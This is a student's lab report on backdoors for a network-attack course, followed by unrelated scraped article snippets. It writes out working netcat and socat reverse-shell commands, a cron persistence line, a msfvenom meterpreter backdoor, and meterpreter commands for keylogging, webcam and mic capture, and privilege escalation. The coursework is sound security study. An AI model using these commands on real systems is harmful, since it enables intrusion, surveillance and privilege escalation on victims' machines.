20155202 张旭《网络对抗》Exp2 后门原理与实践

基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式?

  • 捆绑在软件中
  • 注入在可执行文件里
  • 注入在office文件的宏里面

    例举你知道的后门如何启动起来(win及linux)的方式?

  • 更改名字伪装成其他程序
  • Linux可以使用cron启动
  • Windows下通过任务计划来启动后门程序

    Meterpreter有哪些给你映像深刻的功能?

  • 获取摄像头权限进行拍照
  • 获取麦克风权限进行录音
  • 提升用户权限!!!!!

    如何发现自己有系统有没有被安装后门?

  • 杀毒软件进行扫描,没做过免杀的直接就能被扫出来
  • 观察进程以及端口,看看有没有异常

    常用后门工具实践

    Windows获得Linux Shell

-Windows:使用ipconfig指令查看本机IP:

  • 使用ncat.exe程序监听本机的
    5202端口
  • Kali:使用nc指令的-e选项反向连接Windows主机的5202端口:
  • Windows下成功运行Kali的shell,运行ls指令如下:

- Linux获得Windows Shell

  • Kali:ifconfig查看IP:

  • Kali使用nc指令监听5202端口

  • Windows:使用ncat.exe程序的-e选项项反向连接Kali主机的5202端口:
  • Kali:运行Windows的cmd shell并输入命令执行:
  • 使用nc传输数据

  • Windows下监听5202端口:
  • Kali下连接到Windows5202端口:

  • 建立之后进行文字传输,后面会说道用来传输后门:

实验内容

使用netcat获取主机操作Shell,cron启动

  • 先在Windows系统下,监听5202端口:

  • 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档:
  • crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

  • 用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
  • 在最后一行添加11 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh,意思是在每个小时的第11分钟反向连接Windows主机的5202端口,设置成11的原因是我当时的时间是17:10(这样过一会就能看到连接效果了)

  • 当时间到了17:11时,此时已经获得了Kali的shell,可以输入指令

- 使用socat获取主机操作Shell, 任务计划启动

基础知识

socat是ncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实践过程

  • Windows系统下,打开控制面板下搜索任务计划就可以开始创建任务,填写任务名称后,新建一个触发器:
  • 操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5202 exec:cmd.exe,pty,stderr(两个参数之间用空格或者;),这个命令的作用是把cmd.exe绑定到端口5202,同时把cmd.exe的stderr重定向到stdout上:
  • 创建完成之后,可以windows+L锁定计算机让它执行。

  • 此时,在Kali环境下输入指令socat - tcp:192.168.43.234:5202,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5202端口,此时可以发现已经成功获得了一个cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.80 LPORT=5202 -f exe > 20155202_backdoor.exe生成后门程序:

  • 通过nc指令将生成的后门程序传送到Windows主机上
  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
  • 设置完成后,执行监听:

  • 打开Windows上的后门程序:

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

  • 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令截获一段音频:

  • 使用webcam_snap指令可以使用摄像头进行拍照:
  • 使用webcam stream指令可以使用摄像头进行录像:

  • 使用screenshot指令可以进行截屏:
  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  • 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功:

实验遇到的问题

虚拟机设置时间时候到-用crontab-e指令编辑一条定时任务,在最后一行添加11 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh, 当时间到了17:11时,此时并没有获得Kali的shell,不可以输入指令

解决方法:datakali虚拟机的时间,会发现kali与win7中时间并不相同,然后再用kali中的时间下一分时间即可。

  • 实验总结与体会

  • 这次实验总体不难,就是小问题一直频发,而且最后摄像头还是调用不了,不过好多问题都解决了,我还是很开心。在win7系统上重新实现了实验一往kali里注入shellcode,我很开心,同时真切的感觉到现在的互联网环境之恶劣,我以后也应该更加注意保密意识。

20155202 张旭《网络对抗》Exp2 后门原理与实践的更多相关文章

  1. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  2. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  5. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  6. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. SharePoint designer workflow给一个hyperlink类型得field赋值, How to set value to a hyperlink field by designer workflow

    通过worlfow给一个链接类型得field赋值: 格式是: {link}, {linkDisplayname} 一定要注意逗号后面有个空格. 举个栗子: 如果一个链接显示为 Approve / Re ...

  2. Flex自动回收导致监听不到ModuleEvent.READY事件

    Flex中可以动态载入模块,以达到延迟加载,减小主程序体积的效果.通常可以使用如下代码: var iminfo:IModuleInfo = ModuleManager.getModule(" ...

  3. Python tuple

    元组其实跟列表差不多,也是存一组数,只不是它一旦创建,便不能再修改,所以又叫只读列表 语法 names = (a,b,c) 它只有2个方法,一个是count,一个是index. 当然也有可变元祖: 可 ...

  4. excel表格中添加单引号的方法

    今天碰到需要插入大量数据的excel表格,其中有很多文本,需要添加单引号. 方法如下: 左边是原始数据,右边是我即将添加单引号的空白区域. 第一步:在需要添加的位置输入= 第二步:输入等号之后点击需要 ...

  5. ping 命令 指定特定网卡 发送 ICMP 数据包

    Windows : ping -S Linux : ping -I <device> -I interface interface is either an address, or an ...

  6. mysql的“The user specified as a definer (”@’%') does not exist”问题 解决

    2017-12-27,MYSQL的存储调用时出现了“The user specified as a definer (”test@’%') does not exist”的问题. 网上查过后,都是提示 ...

  7. 【转】Spring学习---为什么要用spring,springMVC

    [原文]https://www.toutiao.com/i6593182323095634445/ 首先,软件里有很多优秀的框架,有一种类型的框架,它的特点是建立在一个现有技术的基础上,提供和现有技术 ...

  8. 【转】Nginx学习---Nginx&&Redis&&hcache三层缓存架构总结

    [原文]https://www.toutiao.com/i6594307974817120782/ 摘要: 对于高并发架构,毫无疑问缓存是最重要的一环,对于大量的高并发,可以采用三层缓存架构来实现,n ...

  9. 【redis】redis的雪崩和穿透

    1.什么是缓存穿透 一般的缓存系统,都是按照key值去缓存查询,如果不存在对应的value,就应该去DB中查找 .这个时候,如果请求的并发量很大,就会对后端的DB系统造成很大的压力.这就叫做缓存穿透. ...

  10. Emmm,从删库到跑路系列之.......Root权限的重要性

    中午导入了一个.SQL文件,晚上查navicat的数据库死活打不开 错误代码1030,想起来中午导入了mysql数据库的user表,而那里面什么也没有... 默默删掉了data,然后emmm --in ...